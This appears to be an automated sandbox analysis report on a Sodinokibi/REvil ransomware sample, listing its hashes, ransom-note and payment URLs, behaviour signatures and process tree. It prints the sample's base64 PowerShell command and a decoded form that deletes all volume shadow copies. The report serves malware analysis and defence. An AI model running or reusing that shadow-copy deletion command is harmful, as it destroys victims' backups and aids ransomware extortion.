Analysis
- max time kernel: 35s
- max time network: 50s
- platform: windows7_x64
- resource: win7v200430
- submitted: 18-07-2020 22:55

Static task: static1

Behavioral task: behavioral1
- Sample: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
- Resource: win7v200430

Behavioral task: behavioral2
- Sample: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
- Resource: win10v200430

General
- Target: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
- Size: 116KB
- MD5: 5b0a782e9b2bc71979e38ef7b2336c3a
- SHA1: 8e14c8062d9fada0f23d1be3cd1ae24437aef093
- SHA256: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15
- SHA512: cf1128c568a08ccdee2806c521e95de30a14d9747efbe50eaff76929c4d744c8ab7a1e592c91cf655a50eb43c63389a27990fab76a2c809585e1399163d3b549
Malware Config
Extracted
- C:\ka0gata-readme.txt
- sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B821AFD3010C9A3C
- http://decryptor.cc/B821AFD3010C9A3C
Signatures

- Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  - PID 1500 wrote to memory of 364: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -> powershell.exe
  - PID 1500 wrote to memory of 364: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -> powershell.exe
  - PID 1500 wrote to memory of 364: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -> powershell.exe
  - PID 1500 wrote to memory of 364: 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe -> powershell.exe

- Enumerates connected drives (3 TTPs)

- Modifies service (2 TTPs, 5 IoCs)
Processes:
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Drops file in Program Files directory (34 IoCs)
Processes:
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  - Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\w8t6591c1.bmp" (2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe)
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes:
  - Token: SeDebugPrivilege, PID 1500, 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
  - Token: SeDebugPrivilege, PID 364, powershell.exe
  - Token: SeBackupPrivilege, PID 1848, vssvc.exe
  - Token: SeRestorePrivilege, PID 1848, vssvc.exe
  - Token: SeAuditPrivilege, PID 1848, vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 1500, 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  - PID 1500, 2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe
  - PID 364, powershell.exe
  - PID 364, powershell.exe
Processes

- C:\Users\Admin\AppData\Local\Temp\2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe (PID 1500)
  Command line: "C:\Users\Admin\AppData\Local\Temp\2c5748124b8609d1cf71a44d77177c9a92bca21f9d9be9c487fdaf6072500f15.bin.exe"
  - Suspicious use of WriteProcessMemory
  - Drops file in Program Files directory
  - Sets desktop wallpaper using registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 364)
    Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
    (The -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all volume shadow copies, which is why vssvc.exe appears below and why the earlier VSS registry writes are attributed to it.)
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses

- C:\Windows\system32\wbem\unsecapp.exe (PID 1096)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding

- C:\Windows\system32\vssvc.exe (PID 1848)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken